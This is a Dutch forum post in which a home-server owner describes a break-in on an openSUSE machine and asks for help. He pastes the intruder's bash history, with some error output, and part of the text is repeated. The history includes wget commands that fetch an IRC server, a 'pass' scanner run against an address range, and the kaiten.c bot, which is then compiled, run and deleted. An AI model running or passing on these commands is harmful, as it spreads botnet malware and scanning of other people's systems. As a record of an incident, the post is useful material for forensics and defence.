Ik draai een linux server thuis, opensuse 11.2 waarop een iscsi target is geconfigureerd. Apache met Mysql draait (wordpress), torrentflux draait en Sabnzbd. Ik ben twee weken niet thuis geweest en verveelde me in het hotel. Afgelopen Maandag via een remote desktop verbinding met mijn windows server thuis een VNC verbinding gemaakt met de linux machine (gaat sneller als rechtstreeks vnc) en de oude sabnzbd geupdate. Werkte en klaar. Afgelopen dinsdag aan het hobby-en geweest met mijn website, die draait bij een provider maar ik test altijd thuis. Ik kon niet inloggen op wp-admin en niet op Sabnzbd. Met putty een verbinding gemaakt, dat lukte met mijn gebruikersnaam maar niet als root. Sudo werkte ook niet. Conclusie er is iets mis, mijn root wachtwoord was gewijzigd. Remote desktop verbinding gemaakt en eerst alle poorten (behalve 3389) dicht gezet. Linux server van buiten niet meer te bereiken. Ik ben niet altijd even netjes met in uitloggen en dat was mijn geluk. Mijn VNC sessie stond nog open en ik had direct toegang tot de Opensuse desktop. Ik kon mijn wachtwoord vanaf de command line wijzigen en ik had weer root toegang. Verder werkt niks. Yast doet het niet, internet doet het niet, en veel applicaties willen niet starten.
Ik niet snap wat er is mis gegaan is (behalve dat remote root access niet uitgeschakeld was), ik heb maar twee accounts, een root en een gebruiker, en beiden gebruiken sterke wachtwoorden. Of Sabnzbd en probleem heeft of opensuse (alle security updates waren geinstalleerd) maakt me nu ook niet uit. Het apparaat moet weer gaan werken en belangrijker, ik wil zeker weten dat de server geen rare dingen doet (denk het niet, want XS4All heeft me nog niet afgesloten). Ik heb de history opgevraagd en tussen mijn laatste opdracht (starten sabnzbd en het terug wijzigen van het root wachtwoord) is het volgende gebeurd: Kan iemand hieraan herlijden wat er is gebeurd (mijn Linux kennis is niet heel sterk). Foutmeldingen die ik nu krijg helemaal hieronder.
Als ik Yast wil starten of sommige andere applicaties.
Een simpele ls
Daarbij doet internet het niet. Verder start de server wel op en heb ik een bureablad (waar de meeste iconen niet gestart kunnen worden)
Uiteraard heb ik al gegoogled, had gehoopt dat een zoek actie naar kaiten.c (die baart me zorgen) licht in de duisternis zou scheppen, maar helaas niet.
Ik niet snap wat er is mis gegaan is (behalve dat remote root access niet uitgeschakeld was), ik heb maar twee accounts, een root en een gebruiker, en beiden gebruiken sterke wachtwoorden. Of Sabnzbd en probleem heeft of opensuse (alle security updates waren geinstalleerd) maakt me nu ook niet uit. Het apparaat moet weer gaan werken en belangrijker, ik wil zeker weten dat de server geen rare dingen doet (denk het niet, want XS4All heeft me nog niet afgesloten). Ik heb de history opgevraagd en tussen mijn laatste opdracht (starten sabnzbd en het terug wijzigen van het root wachtwoord) is het volgende gebeurd: Kan iemand hieraan herlijden wat er is gebeurd (mijn Linux kennis is niet heel sterk). Foutmeldingen die ik nu krijg helemaal hieronder.
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
| 763 ls 764 ps x 765 w 766 ls 767 passwd 768 ls 769 mkdir cn 770 ls 771 apt-get install gcc 772 yum install gcc 773 cd 774 ls 775 cd /root/ 776 ls 777 yum update 778 version 779 ls -al 780 nano root 781 ls 782 cd cn 783 ls 784 wget http://unrealircd.icedslash.com/Unreal3.2.7.tar.gz 785 tar -zxvf Unreal3.2.7.tar.gz 786 cd Unreal3.2.7 787 ./Config 788 make 789 ls 790 w 791 cd 792 cd /home 793 ls 794 wget 795 cd 796 w 797 ls 798 w 799 uptime 800 cd /home 801 cd root 802 ls 803 yum install gcc 804 cd 805 yum install gcc 806 w 807 ls 808 w 809 ls 810 cd /home 811 ls 812 cd 813 exit 814 ls 815 cd cn 816 ls 817 cd Unreal3.2.7 818 make install 819 nano unrealircd.conf 820 nano connect.conf 821 nano oper.conf 822 ./unreal start 823 cd src 824 cd modules 825 wget http://www.angrywolf.org/hideserver.tar.gz 826 tar -zxvf hideserver.tar.gz 827 cd .. 828 make custommodule MODULEFILE=hideserver 829 ./unreal start 830 nano unrealircd.conf 831 nano connect.conf 832 ./unreal start 833 nano /etc/sysconfig/iptables 834 cd 835 nano /etc/sysconfig/iptables 836 vi /etc/sysconfig/iptables 837 nano /etc/init.d/iptables restart 838 cd /etc/sysconfig/iptables 839 w 840 cd /home 841 ls 842 cd serives 843 cd 844 wget npchk.110mb.com/pass.tar 845 tar xvf pass.tar 846 rm -rf pass.tar 847 cd pass 848 ./scan 82.95 849 cd 850 ls 851 ps x 852 ls 853 exit 854 ls 855 cd 856 history 857 cd 858 cd /home/ 859 ls 860 uptime 861 mkdir .un 862 cd .un 863 wget http://f4tal.com/kaiten.c 864 gcc kaiten.c -o kaiten 865 ./kaiten 866 rm kaiten.c 867 exit |
Als ik Yast wil starten of sommige andere applicaties.
code:
1
2
3
4
5
6
7
8
| ~> yast2 /sbin/yast2: line 35: /bin/ls: cannot execute binary file The /proc filesystem is not mounted. /sbin/yast2: line 36: /bin/ls: cannot execute binary file The /sys filesystem is not mounted. /sbin/yast2: line 37: /bin/ls: cannot execute binary file The /dev filesystem is not mounted. If you are running in a chroot environment, bind-mount missing filesystems. |
Een simpele ls
code:
1
2
| ~> ls bash: /bin/ls: cannot execute binary file |
Daarbij doet internet het niet. Verder start de server wel op en heb ik een bureablad (waar de meeste iconen niet gestart kunnen worden)
Uiteraard heb ik al gegoogled, had gehoopt dat een zoek actie naar kaiten.c (die baart me zorgen) licht in de duisternis zou scheppen, maar helaas niet.
:strip_icc():strip_exif()/u/105199/crop5cb76c6d18020_cropped.jpeg?f=community)
.:strip_exif()/u/70496/glowmouse2.gif?f=community)
:strip_icc():strip_exif()/u/46721/wolf-av.jpg?f=community)
:strip_icc():strip_exif()/u/286431/crop680f6b95743ca_cropped.jpg?f=community)
.
:strip_exif()/u/11342/S_borg98.gif?f=community)
:strip_icc():strip_exif()/u/44267/wap11.jpg?f=community)